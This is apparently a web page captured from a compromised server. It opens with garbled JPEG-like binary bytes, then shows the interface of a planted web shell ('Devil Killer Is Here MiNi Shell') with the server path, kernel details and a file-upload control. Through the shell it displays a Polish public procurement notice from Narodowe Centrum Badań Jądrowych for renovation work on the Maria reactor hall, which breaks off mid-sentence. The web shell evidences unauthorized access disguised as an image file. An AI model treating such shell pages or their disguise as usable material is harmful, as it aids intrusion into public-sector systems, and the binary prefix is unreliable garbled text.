JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250904/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250904/0040702701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wielobranżowe prace remontowe, w tym instalatorskie w zakresie adaptacji Hali Fizycznej reaktora Maria zlokalizowanej na terenie Narodowego Centrum Badań Jądrowych w Otwocku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Narodowe Centrum Badań Jądrowych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001024043</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Andrzeja Sołtana 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">222731630</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ncbj.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ncbj.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Instytut badawczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wielobranżowe prace remontowe, w tym instalatorskie w zakresie adaptacji Hali Fizycznej reaktora Maria zlokalizowanej na terenie Narodowego Centrum Badań Jądrowych w Otwocku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-84643a26-42fa-4bdb-88ef-1c60f8f4cb24</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00407027</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ncbj; www.ncbj.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ncbj; www.ncbj.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">: 1.Postępowanie prowadzone jest w<br/>języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/ncbj<br/>2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia, powinien posiadać konto na Platformie<br/>zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie zakupowej oraz korzystanie z Platformy przez Wykonawcę jest<br/>bezpłatne.<br/>3. W postępowaniu komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz wszelkich<br/>oświadczeń odbywa się przy użyciu Platformy. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich wczytania do Platformy.<br/>4. Dokładne informacje o środkach komunikacji elektronicznej oraz o wymaganiach technicznych i organizacyjnych sporządzania,<br/>wysyłania i odbierania korespondencji elektronicznej zawarte zostały w SWZ -TOM I Rozdział 1, ust. 14</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opis zawarty jest w SWZ - Tom I, Rozdział 1, ust. 25</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Opis zawarty jest w SWZ - Tom I, Rozdział 1, ust. 25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EZP.270.62.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są wielobranżowe prace remontowe, w tym instalatorskie w zakresie<br/>adaptacji Hali Fizycznej reaktora Maria zlokalizowanej na terenie Narodowego Centrum Badań<br/>Jądrowych w Otwocku m. in.:<br/>1) Wykonanie robót budowlanych wraz z niezbędną infrastrukturą towarzyszącą w oparciu<br/>o dokumentację przetargową, gdzie szczegółowy zakres robót jest przedstawiony w OPZ.<br/>2) Wykonanie, uruchomienie i sprawdzenie/przetestowanie określonych w OPZ urządzeń i instalacji<br/>elektrycznych.<br/>3) Wykonanie, uruchomienie i sprawdzenie/przetestowanie określonych w OPZ urządzeń i instalacji<br/>sanitarnych.<br/>4) Opracowanie dokumentacji powykonawczej.<br/>Szczegółowy opis przedmiotu zamówienia – Tom III SWZ – Opis przedmiotu zamówienia wraz z załącznikami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">51100000-3 - Usługi instalowania urządzeń elektrycznych i mechanicznych</p> <p class="mb-0">44423000-1 - Artykuły różne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia dotychczasowemu wykonawcy robót budowlanych<br/>zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, tj. polegających na powtórzeniu<br/>podobnych prac zgodnych z przedmiotem zamówienia podstawowego o wartości do 50% szacunkowej wartości zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">KRYTERIA OCENY OFERT<br/>21.1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert:<br/>Cena – 90 % = 90 pkt<br/>Okres gwarancji – 10 % = 10 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) dotyczącej Wykonawcy<br/>a) Warunek zostanie spełniony, jeżeli Wykonawca wykaże się doświadczeniem wykonania w<br/>okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy w tym okresie, co najmniej dwóch robót budowlanych (obejmujących<br/>wykonanie robót ogólnobudowlanych, sanitarnych i elektrycznych) polegających na wykonaniu<br/>budowy lub przebudowy lub remontu obiektu budowlanego o wartości nie mniejszej niż 200<br/>000,00 zł (słownie: dwieście tysięcy złotych) brutto każda<br/>2) dotyczącej osób:<br/>Warunek zostanie spełniony, jeżeli Wykonawca będzie dysponował na etapie realizacji zamówienia osobami zdolnymi do wykonania zamówienia, które spełniają następujące wymagania:<br/>a) Kierownik robót - posiadający uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalności konstrukcyjno-budowlanej olub odpowiadające im ważne uprawnienia<br/>budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.<br/>b) Kierownik robót - posiadający uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych lub<br/>odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów.<br/>c) Kierownik robót - posiadający uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych lub odpowiadające im ważne uprawnienia budowlane, w zakresie<br/>pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zamawiający dopuszcza składanie przez osoby będące obywatelami państw członkowskich Unii<br/>Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o<br/>Wolnym Handlu (EFTA) – strony umowy o Europejskim Obszarze Gospodarczym dokumentów<br/>potwierdzających nabycie kwalifikacji zawodowych do wykonywania działalności w budownictwie,<br/>równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium<br/>Rzeczypospolitej Polskiej wraz z odpowiednią decyzją o uznaniu kwalifikacji zawodowych zgodnie z<br/>przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów<br/>budownictwa.<br/>W przypadku Wykonawców zagranicznych dopuszcza się równoważne kwalifikacje zdobyte w<br/>innych państwach na zasadach określonych w art. 12a ustawy z dnia 7.7.1994 r. - Prawo budowlane<br/>z uwzględnieniem postanowień ustawy z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 r., poz. 65). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty – zgodnie ze wzorem, który stanowi Formularz 3.4.<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, lub kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie<br/>do dysponowania tymi osobami – zgodnie ze wzorem, który stanowi Formularz 3.5</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu Oferty<br/>wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy,<br/>Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotów<br/>udostępniających zasoby; w przypadku wskazania przez Wykonawcę dostępności ww.<br/>dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz<br/>Strona 14 z 37<br/>danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski<br/>pobranych samodzielnie przez Zamawiającego dokumentów<br/>2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy lub podmiotu udostępniającego zasoby chyba, że umocowanie do reprezentacji<br/>wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW;<br/>3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu).<br/>Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>4) oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z<br/>uwzględnieniem postanowień pkt. 18.3. IDW;<br/>5) zobowiązania wymagane postanowieniami pkt. 11.3. IDW, w przypadku gdy Wykonawca polega<br/>na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków<br/>udziału w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania danego<br/>zobowiązania nie wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW;<br/>6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa<br/>w art. 117 ust. 4 ustawy Pzp;<br/>7) oświadczenie wymagane postanowieniami pkt. 10.2., 11.9. i 13.3. IDW <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> WYMAGANIA DOTYCZĄCE WADIUM<br/>18.1. Zamawiający ustala wadium na całość przedmiotu zamówienia w wysokości 3 500,00 zł (słownie: trzy<br/>tysiące pięćset złotych).<br/>18.2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących<br/>formach wymienionych w art. 97 ust. 7 ustawy Pzp, w zależności od wyboru Wykonawcy.<br/>18.3. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej. Wadium takie musi<br/>obejmować cały okres związania ofertą. Treść gwarancji lub poręczenia nie może zawierać<br/>postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta.<br/>Jako Beneficjenta wadium wnoszonego w formie gwarancji lub poręczenia należy wskazać –<br/>„Narodowe Centrum Badań Jądrowych, ul. Andrzeja Sołtana 7, 05-400 Otwock NIP: 532-010-01-<br/>25, REGON 001024043”<br/>W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja<br/>lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp.<br/>Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie<br/>wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne<br/>żądanie Zamawiającego.<br/>Gwarancja lub poręczenie musi zawierać w swojej treści wskazanie adresu e-mail lub adresu<br/>pocztowego na który Zamawiający prześle oświadczenie o zwolnieniu wadium.<br/>Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność<br/>jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie<br/>nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż<br/>wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim<br/>i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa.<br/>18.4. Wadium w pieniądzu (PLN) należy wnieść najpóźniej przed upływem terminu składania ofert,<br/>przelewem na konto:<br/>Dla wykonawcy krajowego: Nr konta PKO BP XII O/W-wa 95 1020 1026 0000 1902 0173 4110 z<br/>dopiskiem „Wadium, nr sprawy EZP.270.62.2025”<br/>Dla wykonawcy zagranicznego: Nr rachunku 95 1020 1026 0000 1902 0173 4110, IBAN PL 95 1020 1026<br/>0000 1902 0173 4110, SWIFT BPKOPLPW,<br/>PKO Bank Polski SA, II Regionalne Centrum Korporacyjne w Warszawie<br/>ul. Nowogrodzka 35/41, 00-950 Warszawa.<br/>1) Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający<br/>zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>2) W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty<br/>zostaje termin uznania kwoty na rachunku Zamawiającego.<br/>3) Nie wniesienie wadium w terminie lub w sposób określony w SWZ spowoduje odrzucenie oferty na<br/>podstawie art. 226 ust. 1 pkt 14 ustawy Pzp<br/>18.5. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1 i 2 ustawy Pzp.<br/>Wykonawca będzie miał możliwość w przypadkach określonych w art. 98 ust. 2 ustawy Pzp wystąpienia<br/>o zwrot wadium, przy czym złożenie wniosku o zwrot wadium spowoduje rozwiązanie stosunku<br/>prawnego Zamawiającego z Wykonawcą i utratę przez Wykonawcę prawa do korzystania ze środków<br/>ochrony prawnej, uregulowanych w Dziale IX ustawy Pzp.<br/>18.6. Zamawiający zwróci wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub<br/>poręczycielowi oświadczenia o zwolnieniu wadium. Zaleca się, aby poręczenie lub gwarancja<br/>wskazywały adres mailowy na jaki Zamawiający winien składać oświadczenie o zwolnieniu wadium, o którym mowa w art. 98 ust. 5 ustawy Pzp.<br/>18.7. Zamawiający zatrzyma wadium wraz z odsetkami, w przypadkach określonych w art. 98 ust. 6 ustawy<br/>Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może<br/>podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w art. 7 ust. 1 ustawy o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego5<br/>natomiast 